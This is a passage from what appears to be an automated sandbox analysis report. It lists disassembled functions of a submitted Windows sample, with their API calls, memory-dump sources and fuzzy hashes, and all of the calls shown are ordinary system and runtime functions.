                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: ca531e9c918ae4fd49649addd44b1ae1832951afb1dd84840adb59b68b3b166b
                  • Instruction ID: 1eb4d517b8778eac936e64202776c66b1363d15b4580804c3acfdf8bc65cc4c9
                  • Opcode Fuzzy Hash: ca531e9c918ae4fd49649addd44b1ae1832951afb1dd84840adb59b68b3b166b
                  • Instruction Fuzzy Hash: 46F0E931641121BBFF211E269C01B5B7788AF937B0B16C111BC18E70C1CF20DD058AE4
                  Function 00175BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00175BDC
                    • Part of subcall function 0017B07D: __EH_prolog.LIBCMT ref: 0017B082
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 9bce701019dc41ad803d6bc49f8c40f8679e07d834208578f368e4f397ae88a2
                  • Instruction ID: 2cb859edf4adb2f6d6215bab23afee881e68cbe95f143f6f20df13ec7b35f059
                  • Opcode Fuzzy Hash: 9bce701019dc41ad803d6bc49f8c40f8679e07d834208578f368e4f397ae88a2
                  • Instruction Fuzzy Hash: 92016D34A15694DAC725F7A8C0553DEF7B49F29700F40959DB89E53283CFB41B09C762
                  Function 00198518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0019C13D,00000000,?,001967E2,?,00000008,?,001989AD,?,?,?), ref: 0019854A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: bb90f05d5dfa678039f0c876c388ec669605143a52594382eed371404bd36272
                  • Instruction ID: af5524f44eda45617fad46b4b69d44b9603146b254480f63e0d4d14fb8946e7b
                  • Opcode Fuzzy Hash: bb90f05d5dfa678039f0c876c388ec669605143a52594382eed371404bd36272
                  • Instruction Fuzzy Hash: 14E0ED31645221ABFF312A69AC01B9A7B8CAF937B0F170221BC18E2080CF20CC0485F5
                  Function 0017A4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                  Download Yara Rule
                  APIs
                  • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0017A4F5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: CloseFind
                  • String ID:
                  • API String ID: 1863332320-0
                  • Opcode ID: e08d61aab76600c38475c0fc5ac9e65348afd84cd8dd250ba1db9137ce4d0cc4
                  • Instruction ID: 660e2a8f0caf3c340f67e2c39d0b961c272a931f58e5155e4cb8771769eed7ad
                  • Opcode Fuzzy Hash: e08d61aab76600c38475c0fc5ac9e65348afd84cd8dd250ba1db9137ce4d0cc4
                  • Instruction Fuzzy Hash: 24F0E93100D380AACA221B7848047CEBBB46F6A331F44CA4DF2FD02191C3B514C59723
                  Function 0018067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                  Download Yara Rule
                  APIs
                  • SetThreadExecutionState.KERNEL32(00000001), ref: 001806B1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ExecutionStateThread
                  • String ID:
                  • API String ID: 2211380416-0
                  • Opcode ID: 911882f91964a46fb554b4274cc5617ef890d9ea7fb045a27dc2158b0aa83ff1
                  • Instruction ID: 82794e530e952e1c9211b289f8c8e5e1443636244a5c164dca38a7b74a421d99
                  • Opcode Fuzzy Hash: 911882f91964a46fb554b4274cc5617ef890d9ea7fb045a27dc2158b0aa83ff1
                  • Instruction Fuzzy Hash: 9FD0C22574011036C6223324A8057FF1A1A0FDB720F080025B40D535828F4609CA4BA2
                  Function 00189D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GdipAlloc.GDIPLUS(00000010), ref: 00189D81
                    • Part of subcall function 00189B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00189B30
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Gdip$AllocBitmapCreateFromStream
                  • String ID:
                  • API String ID: 1915507550-0
                  • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                  • Instruction ID: f65d376759e8f26472090665094b74815c0d1c46e1b521e079e77ef8fb119680
                  • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                  • Instruction Fuzzy Hash: D6D0C73065420DBADF45BAB59C02A7A7BEADB10350F144175BC0886151EF71DF20AB65
                  Function 00179989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                  Download Yara Rule
                  APIs
                  • GetFileType.KERNELBASE(000000FF,00179887), ref: 00179995
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: FileType
                  • String ID:
                  • API String ID: 3081899298-0
                  • Opcode ID: b1c5480045303e98c2fff359bb28a26a182587f058c8fab1e0da68735bce1126
                  • Instruction ID: 42beb007ec5655942b36da931d3a885dd1ab50709d0aaec95711e550baf492f7
                  • Opcode Fuzzy Hash: b1c5480045303e98c2fff359bb28a26a182587f058c8fab1e0da68735bce1126
                  • Instruction Fuzzy Hash: B7D01231011141959F2146344D0919AB771DB8337EB38C6A8E129C40A1D727C947F541
                  Function 0018D41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0018D43F
                    • Part of subcall function 0018AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0018AC85
                    • Part of subcall function 0018AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0018AC96
                    • Part of subcall function 0018AC74: IsDialogMessageW.USER32(00010484,?), ref: 0018ACAA
                    • Part of subcall function 0018AC74: TranslateMessage.USER32(?), ref: 0018ACB8
                    • Part of subcall function 0018AC74: DispatchMessageW.USER32(?), ref: 0018ACC2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Message$DialogDispatchItemPeekSendTranslate
                  • String ID:
                  • API String ID: 897784432-0
                  • Opcode ID: cacd66a32467111a26b65be1985ba65ace1dca1070b4215371b3f4af4c09baa0
                  • Instruction ID: 722d5d7a0cc6daba26cff8e10069ec73c0fbf8bf74cfb20fc320892d178c8e24
                  • Opcode Fuzzy Hash: cacd66a32467111a26b65be1985ba65ace1dca1070b4215371b3f4af4c09baa0
                  • Instruction Fuzzy Hash: 10D09E31144300ABD6112B51CE07F0F7AA6AB98B05F404655B348754B187729D61DB16
                  Function 0018D891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: b738cde4e0e1c397ad92f69285635fbf3d0442ef338a40cd19ac5851426f7c24
                  • Instruction ID: 3a1a98993c129bedfdcf63fd31b3c3b545ad59be227b6765dedf5093a4218151
                  • Opcode Fuzzy Hash: b738cde4e0e1c397ad92f69285635fbf3d0442ef338a40cd19ac5851426f7c24
                  • Instruction Fuzzy Hash: FBB0129926C3017C310C31507D92C3B031CC6D3B11331852BF109F00C1D7405D499D31
                  Function 0018D8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 5dc1b83312700b47eb55b3c6a2488c22ace930ab7c39a3014ffa85fb52c58be3
                  • Instruction ID: 7bb599416bfaa23754460df4f70172e001a4906ff04da343eddc5f94e81d8139
                  • Opcode Fuzzy Hash: 5dc1b83312700b47eb55b3c6a2488c22ace930ab7c39a3014ffa85fb52c58be3
                  • Instruction Fuzzy Hash: A9B0129526C2017C310C71547D42D36032CC6D3B10330C01BF509E02C1D7406D0A1E31
                  Function 0018D8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 09d0f025933ef14c444c293f005902c6707f8ef019cdc5f531aff1a6168261b6
                  • Instruction ID: bbfa7312c719de64738741f952ce60dc4ec9e60b310eceabf406bc58357182f5
                  • Opcode Fuzzy Hash: 09d0f025933ef14c444c293f005902c6707f8ef019cdc5f531aff1a6168261b6
                  • Instruction Fuzzy Hash: 24B0129926C3027C310C71547D82D3B031CD6D3B11330801BF109E01C1D7405D055F31
                  Function 0018D8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: b1685d059514d7d4849049bba71f744036d0be316918c9774db4379f5399746a
                  • Instruction ID: b5fb837de88f3a846a435875fa860cae20da50115f41986398bb25b2e6b954d1
                  • Opcode Fuzzy Hash: b1685d059514d7d4849049bba71f744036d0be316918c9774db4379f5399746a
                  • Instruction Fuzzy Hash: 6CB012A526C2017C310C71547D42D36031CC6D3B10330C01BF50DE01C1D7405E061E31
                  Function 0018D8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: b0768d15200cce8246564b7001be907b38505ffcb95e196423364220424267e7
                  • Instruction ID: 3618469a9222c5a952cc81ba36741ed1ffd3036df1d52047ba28c1e5c58a9d58
                  • Opcode Fuzzy Hash: b0768d15200cce8246564b7001be907b38505ffcb95e196423364220424267e7
                  • Instruction Fuzzy Hash: A6B0129526C2017C310C71547E42D36032CC6D3B10330C01BF109E02C1D7506E0F1E31
                  Function 0018D8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 1924feda8c5c625c46b0d3ba8ee88c2702e340447d73a4cfc0ccbb6e65fea665
                  • Instruction ID: b7930c23861b920d8a0c57af041f7229c7aded5aed634974bc940ca0dffec017
                  • Opcode Fuzzy Hash: 1924feda8c5c625c46b0d3ba8ee88c2702e340447d73a4cfc0ccbb6e65fea665
                  • Instruction Fuzzy Hash: B6B0129526C3417C314C71547D42D36032CC6D3B10371C11BF109E02C1D7406D8A1E31
                  Function 0018D8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 0e7c587f84a5e49b3626be8b3c82ae4a7ce08f8cb443f962779aa9acde05abf2
                  • Instruction ID: 1c7113ea118647f3d187bf56388142c04d608b88f3ff4123181415030e78ec2a
                  • Opcode Fuzzy Hash: 0e7c587f84a5e49b3626be8b3c82ae4a7ce08f8cb443f962779aa9acde05abf2
                  • Instruction Fuzzy Hash: 66B012A526C2027C310C7155BD42D36031CC6D3B10330801BF10DE01C1D7405E061E31
                  Function 0018D8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 9a84f8dcaed14e5efd4e24597518422a97363f71815f6ab2ce5958e578a07596
                  • Instruction ID: fe278a60f6cc8e1f1438a1fd73eb8a964b21eaa65083e86a8d6465684ff0147b
                  • Opcode Fuzzy Hash: 9a84f8dcaed14e5efd4e24597518422a97363f71815f6ab2ce5958e578a07596
                  • Instruction Fuzzy Hash: 98B012A526C2017C310C71547E42D36031CC6D3B10330801BF10DE01C1D7405F071E31
                  Function 0018D8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
